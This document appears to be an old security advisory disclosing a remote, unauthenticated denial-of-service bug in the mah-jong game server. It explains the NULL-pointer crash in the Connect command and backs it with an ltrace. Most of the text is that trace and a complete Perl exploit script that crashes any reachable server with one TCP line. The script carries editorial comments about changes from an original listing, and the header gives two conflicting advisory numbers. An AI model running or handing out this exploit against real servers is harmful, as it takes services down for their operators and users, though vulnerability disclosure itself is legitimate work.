======================================== Ph4nt0m Security Advisory #2003--9-9 ========================================
mah-jong server -- remote denial-of-service vulnerability
By jsk, in ph4nt0m.net(c) Security. E-mail: jsk[at]ph4nt0m.net
Advisory Number : pst-2003--10-12-007
Program Name : mah-jong
Version : all versions (the new version 1.6 is vulnerable) (not fixed by DSA-378-1)
Type : remote DoS (NULL-pointer dereference, triggered by a single unauthenticated "Connect" line)
OS Affected : Debian (DSA-378-1 does not cover this bug) or any other OS running the server
*****************************************************************************
Description : a NULL-pointer dereference in the server's command-argument handling. The "Connect" command is parsed into its arguments; when the expected further argument is absent (the client sends only "Connect 1034 0"), the server passes a NULL pointer to strncmp() and the process dies with SIGSEGV. Any client that can reach the server's TCP port can crash it with one line of input -- no credentials are involved, the Connect message is the first thing a client sends. Impact is limited to denial of service; nothing in the trace below suggests control of execution.
*****************************************************************************
Details: ltrace of the server while it receives "Connect 1034 0\r\n" from the exploit below
*****************************************************************************
.............
read(4, "C", 1) = 1
read(4, "o", 1) = 1
read(4, "n", 1) = 1
read(4, "n", 1) = 1
read(4, "e", 1) = 1
read(4, "c", 1) = 1
read(4, "t", 1) = 1
read(4, " ", 1) = 1
read(4, "1", 1) = 1
read(4, "0", 1) = 1
read(4, "3", 1) = 1
read(4, "4", 1) = 1
read(4, " ", 1) = 1
read(4, "0", 1) = 1
read(4, "\r", 1) = 1
read(4, "\n", 1) = 1
strlen("Connect 1034 0\r\n") = 16
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
strcmp("Connect", "SaveState") = -16
strcmp("Connect", "LoadState") = -9
strcmp("Connect", "Connect") = 0
malloc(16) = 0x08080db0
sscanf(0x080845f8, 0x08076fa0, 0xbffff77c, 0xbffff784, 1) = 1
__ctype_b_loc(1, 0, 
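# (ltrace output, continued from above)
# 0x400148cc, 0x40014ec8, 1) = 0x40157418
# __ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
# sscanf(0x080845fd, 0x08076fa0, 0xbffff77c, 0xbffff784, 1) = 1
# __ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
# strncmp(NULL, "Robot", 5 --- SIGSEGV (Segmentation fault) ---
#
# Both sscanf() calls return 1, i.e. the two numeric fields of "Connect 1034 0"
# are consumed; the handler then hands the (absent) next argument -- a NULL
# pointer -- to strncmp(), which is where the server crashes.
# **********************************************************************************************
# exploit:
#!/usr/bin/perl
# DoS test for mah-jong 1.6 (all versions are affected) -- code by jsk, ph4nt0m.net
# Tested on Slackware 9.0.
#
# The script opens one TCP connection to the server and sends a single
# "Connect 1034 0\r\n" line with the next argument missing. The trace above
# shows the server's Connect handler then calling strncmp() on a NULL pointer
# and dying with SIGSEGV. Nothing else is sent and no reply is read.
#
# Fixes relative to the original listing:
#  - the usage message names its two arguments again (the "<host> <port>"
#    placeholders were lost from the original text);
#  - the "-s" perl switch is dropped, as it would parse a host or port that
#    begins with "-" as a script option instead of passing it through;
#  - the payload is sent from the $jsk variable, which the original assigned
#    but never used, so the string exists in exactly one place;
#  - the send and the close are checked so a silent failure cannot be
#    mistaken for a successful crash.
#
# usage: ./dosmj.pl <host> <port>
use strict;
use warnings;
use IO::Socket;

# Both arguments are required; "0" or "" is rejected as in the original.
if (@ARGV < 2 || !$ARGV[0] || !$ARGV[1]) {
    print "usage: ./dosmj.pl <host> <port>\n";
    exit(-1);
}
my ($host, $port) = @ARGV[0, 1];

# The crashing message: a Connect line that stops after the two numeric fields.
my $jsk = "Connect 1034 0";

my $socket = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $host,
    PeerPort => $port,
);
die "unable to connect to $host:$port ($!)\n" unless $socket;

# Same bytes on the wire as the original: the payload followed by CRLF.
print {$socket} $jsk, "\r\n" or die "unable to send to $host:$port ($!)\n";
close($socket) or die "error closing connection to $host:$port ($!)\n";
# **********************************************************************************************
# patch : http://www.stevens-bradfield.com/MahJong/
# Julian Bradfield (upstream) or the Debian security team will patch it.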